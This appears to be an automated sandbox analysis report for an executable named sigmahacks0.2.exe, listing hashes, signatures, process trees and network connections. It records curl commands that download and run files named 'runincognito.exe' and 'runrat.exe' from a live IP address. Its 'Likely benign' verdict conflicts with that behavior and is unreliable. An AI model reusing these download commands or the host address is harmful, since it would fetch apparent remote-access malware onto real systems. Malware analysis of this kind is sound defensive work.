Analysis Overview
SHA256
3c8d5c2b52242137822451d7ce4ba46e04087a8de82a427a4c1450aa09e85af3
Threat Level: Likely benign
The file sigmahacks0.2.exe was found to be: Likely benign.
Malicious Activity Summary
Unsigned PE
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-06-12 16:35
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-12 16:35
Reported
2024-06-12 16:37
Platform
win10v2004-20240508-en
Max time kernel
63s
Max time network
50s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 3664 wrote to memory of 216 | N/A | C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe | C:\Windows\system32\cmd.exe |
| PID 3664 wrote to memory of 216 | N/A | C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe | C:\Windows\system32\cmd.exe |
| PID 216 wrote to memory of 4508 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe |
| PID 216 wrote to memory of 4508 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe |
| PID 216 wrote to memory of 876 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\dllhost.exe |
| PID 216 wrote to memory of 876 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\dllhost.exe |
| PID 216 wrote to memory of 3536 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe |
| PID 216 wrote to memory of 3536 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\curl.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe
"C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\465F.tmp\4660.tmp\4671.bat C:\Users\Admin\AppData\Local\Temp\sigmahacks0.2.exe"
C:\Windows\system32\curl.exe
curl -s -o dllhost.exe "http://45.157.232.173:5151/downloads/runincognito.exe"
C:\Windows\system32\dllhost.exe
dllhost.exe
C:\Windows\system32\curl.exe
curl -s -o Incognito.exe "http://45.157.232.173:5151/downloads/runrat.exe"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| DE | 45.157.232.173:5151 | N/A | tcp |
| DE | 45.157.232.173:5151 | N/A | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\465F.tmp\4660.tmp\4671.bat
| Hash | Value |
| --- | --- |
| MD5 | aa6cd2e5eea38082199a03f164836f90 |
| SHA1 | 93f21ab96c7f4b66e3d6d221414bbd7f82b3a293 |
| SHA256 | 035ddce5103edf606392d566ab937bd060c1e6510eb5ffd7ffa1fc8c71f5853a |
| SHA512 | dde5c9196df1246b5bbd69a7926fe8aa514c82daa01ead3eca1e5b1fdeb2c86678881cfabf8bf78a501be366a272c6aac92849a77d58e5db2bd6cda511a6cc06 |